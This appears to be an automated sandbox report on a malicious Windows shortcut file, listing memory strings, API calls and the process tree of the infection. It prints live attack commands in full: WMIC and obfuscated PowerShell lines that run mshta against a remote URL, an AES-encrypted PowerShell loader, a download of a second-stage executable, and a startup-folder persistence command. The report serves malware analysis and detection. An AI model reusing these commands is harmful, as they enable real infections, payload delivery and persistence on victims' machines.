memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer@*memstr_3bc08da0-0
Source: powershell.exe, 00000008.00000002.3499608749.000002AB972FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_07ac97da-b
Source: powershell.exe, 00000008.00000002.3499608749.000002AB972FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer@*memstr_497e3606-d
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: This is a third-party compiled AutoIt script.15_2_00007FF7BB7E37B0
Source: rMpqCJnPv.exeString found in binary or memory: This is a third-party compiled AutoIt script.
Source: rMpqCJnPv.exe, 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_cafa066c-0
Source: rMpqCJnPv.exe, 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer@*memstr_c631736d-0
Source: rMpqCJnPv.exe.8.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_56868ea1-b
Source: rMpqCJnPv.exe.8.drString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer@*memstr_e7bd1622-b
Contains functionality to create processes via WMI
Source: WMIC.exe, 00000000.00000002.2063394355.000002902A9D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Windows\System32\Wbem\wmic.exe"C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/baochuan1')"C:\Users\user\Desktop\FzmtNV0vnG.lnkWinsta0\Defaultmemstr_423e07b3-c
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Guard.exeJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeJump to dropped file
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Windows shortcut file (LNK) contains suspicious command line arguments
Source: FzmtNV0vnG.lnkLNK file: process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/baochuan1')"
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB85C110: CreateFileW,DeviceIoControl,CloseHandle,15_2_00007FF7BB85C110
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB84D2C4 GetCurrentProcess,OpenProcessToken,CreateEnvironmentBlock,CloseHandle,CreateProcessWithLogonW,DestroyEnvironmentBlock,15_2_00007FF7BB84D2C4
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB85D750 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,15_2_00007FF7BB85D750
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB87F63015_2_00007FF7BB87F630
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB7F3C2015_2_00007FF7BB7F3C20
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB88DB1815_2_00007FF7BB88DB18
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB861A1815_2_00007FF7BB861A18
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB7FFA4F15_2_00007FF7BB7FFA4F
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB7EB9F015_2_00007FF7BB7EB9F0
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB88BA0C15_2_00007FF7BB88BA0C
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB81793C15_2_00007FF7BB81793C
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB87206C15_2_00007FF7BB87206C
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB7E5F3C15_2_00007FF7BB7E5F3C
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB80BEB415_2_00007FF7BB80BEB4
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB7EBE7015_2_00007FF7BB7EBE70
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB7EB39015_2_00007FF7BB7EB390
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB8732AC15_2_00007FF7BB8732AC
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB82529C15_2_00007FF7BB82529C
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB80F8D015_2_00007FF7BB80F8D0
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB7F58D015_2_00007FF7BB7F58D0
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB7E183C15_2_00007FF7BB7E183C
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB82184015_2_00007FF7BB821840
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB85D87C15_2_00007FF7BB85D87C
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB8917C015_2_00007FF7BB8917C0
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB81175015_2_00007FF7BB811750
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB8756A015_2_00007FF7BB8756A0
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB8195B015_2_00007FF7BB8195B0
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB876C3415_2_00007FF7BB876C34
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB880AEC15_2_00007FF7BB880AEC
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB7E2AE015_2_00007FF7BB7E2AE0
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB8130DC15_2_00007FF7BB8130DC
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB7F2E3015_2_00007FF7BB7F2E30
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB7F0E7015_2_00007FF7BB7F0E70
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB88CE8C15_2_00007FF7BB88CE8C
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB800E9015_2_00007FF7BB800E90
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB826DE415_2_00007FF7BB826DE4
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB822D2015_2_00007FF7BB822D20
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB8184C015_2_00007FF7BB8184C0
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB80451415_2_00007FF7BB804514
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB8683D415_2_00007FF7BB8683D4
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB80C3FC15_2_00007FF7BB80C3FC
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB82240015_2_00007FF7BB822400
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB87632015_2_00007FF7BB876320
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB87836015_2_00007FF7BB878360
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB8002C415_2_00007FF7BB8002C4
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB80C13015_2_00007FF7BB80C130
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB81A8A015_2_00007FF7BB81A8A0
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB8267F015_2_00007FF7BB8267F0
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB88C6D415_2_00007FF7BB88C6D4
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB88A59C15_2_00007FF7BB88A59C
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB88055C15_2_00007FF7BB88055C
Source: Joe Sandbox ViewDropped File: C:\Users\Public\Guard.exe D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: String function: 00007FF7BB808D58 appears 76 times
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 2595
Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 2595Jump to behavior
Source: classification engineClassification label: mal100.expl.evad.winLNK@43/61@4/2
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB863778 GetLastError,FormatMessageW,15_2_00007FF7BB863778
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB84D5CC LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,15_2_00007FF7BB84D5CC
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB84CCE0 AdjustTokenPrivileges,CloseHandle,15_2_00007FF7BB84CCE0
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB8659D8 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,15_2_00007FF7BB8659D8
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB85BE00 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,15_2_00007FF7BB85BE00
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB865F2C CoInitialize,CoCreateInstance,CoUninitialize,15_2_00007FF7BB865F2C
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB7E6580 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,15_2_00007FF7BB7E6580
Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7744:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6520:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8096:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7996:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2604:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5om35xfj.vi5.ps1Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: FzmtNV0vnG.lnkVirustotal: Detection: 26%
Source: FzmtNV0vnG.lnkReversingLabs: Detection: 21%
Source: unknownProcess created: C:\Windows\System32\wbem\WMIC.exe "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/baochuan1')"
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/baochuan1')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://tiffany-careers.com/baochuan1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://tiffany-careers.com/baochuan1
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '5FC32DF1C0FFAB04AD1461E41B34580CF686186BB175883500353248755372D1E74F294A259C979896FEA6271F154228B3BF0D6A9D0D9F6569B9D41A9A3D09A63BCE9C837BE004A6208D93ACB87F6C547277A8C3268B742B3EF6AEA9AEAFEE59C43BF887EB0182FB5943B2947D27E46DFAAD9FE12776123E736F027853F8BC8DFCF554869724A0AA804A9049D9EA7ACBEED4C412BB6C4D4602CFC90CF615287E6C6555C8E0B6CEE3AACB66AFC773E9192903227F0CE014AE4A150CCCE925B6B22D440B7F3E392520613C07711AF2978A272709AFC70BEDE8C3201483207E66D3D483012204164092C58F5895F1B4B38C5CE831D1917AC33B6FF65EBC1F0946D72FFD582B689656A77B66A88C471D7DE4C8AAD142463BAC97A96E31AFC766F1FDD6B3267516F8027B807DBCDA9A77CC0B3EF0AFCA30DAE6A4A90E6590D26CF5960B3F113201E74E50BCC37179E67420FB07540AB18B8A281F6F6E1E0974AB449D8C5426F8776DCAD4AE3752D5ED8DD77E80E582F37E99699AC94D58A627C408F56A6BAB4FF2A4634255575F0A373CE9D4F81D7D85A6FDD69653A9ACD82342A04DE1D703FF55FD77C7093583E7A8DE7DD76FAA4FC7DC3AE525F2923AB6D03FA2CF6E1C0045EB1AE1B01FE2DCE5F0DF7AF916F7F3D8FFFCF35BA8DFEE6863AACCA2AF778D9372C039EF1AA4F66FE4C9A7B7E6B4B690EE8B5F365AFD2B94E0804532372C711FBB3284815793750781C1A32513D741D2441259E82D27F9EDAFE0F914EBC4098FCA1B2028271CE736D3BF191C47416E402EA4570B4E235E7AEE572814275E385B72FBB0EBB4E4A71440B44DF5AD9DD6C30D1FE13CF9470F4635440674E87C75280F2FD7AC139781FEE2CBD3BFB5E93BCAD4DAED74847E6BE4FD41C380DA9D3A7A21A32566CEC4C0BB9EAA0C494BAE968EB32720676452D8771B05F9FBED066BEEC71BED78275BC817D8373317584369A8DD60E296BA3A7576111EB07BB121D2FC9B92A15C9F813BAFBD25A0F89684CBA0692BCA686C8E2C8FC8B185E944941525012042EAF50007E259FC3ECD739FA2F61F6FB8325658A744B3E4DE0CED8D320510C3299CAE545C675E7E88D3B7A101C08FD1C8926471E91C6E79F62B497DD1CC8DD442A85E3C31FEB6E31E75149AA77C8D8B3DFE3CB4D3B9ED06691EE63BC9248DF964984D9E605967CD19AC1E1190D2B1FC8F1C2F12A7615AAF59A39ACFBDC1A5D1067B10A03DE63D10C8C973A264985FB7E40DC8D397B060C3C2144591271FF47D80C0C4EFD88E885F4D18CCA2CED83B8D1BD66297A6F61B3062A0F96F4B4DC0076B70FB8A8DD887142732D4A65A96B6FD7A0352D9488FAFF981B4E138BD5D5E350C18AD7F5DD70FB56686D79B20038823B95E423BC9AD64AA072C87E558C58E9D04720A12E07C3C08A91A0E105DC9FE126B797B360396173D676F52756A6E514D4757514A4D594F475365';function vxx ($xHDThLVi){return -split ($xHDThLVi -replace '..', '0x$& ')};$FMAPhot = vxx($ddg.SubString(0, 2048));$pBL = [System.Security.Cryptography.Aes]::Create();$pBL.Key = vxx($ddg.SubString(2048));$pBL.IV = New-Object byte[] 16;$KNBWNbH = $pBL.CreateDecryptor();$NjZFZrE = [System.String]::new($KNBWNbH.TransformFinalBlock($FMAPhot, 0,$FMAPhot.Length)); sal fd $NjZFZrE.Substring(3,3); fd $NjZFZrE.Substring(6)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Job_Description.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2104 --field-trial-handle=1656,i,6298120100990453940,17586476426563717861,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe "C:\Users\user\AppData\Roaming\rMpqCJnPv.exe"
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/gIpBYOi" -OutFile "C:\Users\Public\Guard.exe""
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\Guard.exe "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
Source: C:\Users\Public\Guard.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js"
Source: C:\Windows\System32\conhost.exeProcess created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://tiffany-careers.com/baochuan1"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://tiffany-careers.com/baochuan1Jump to behavior
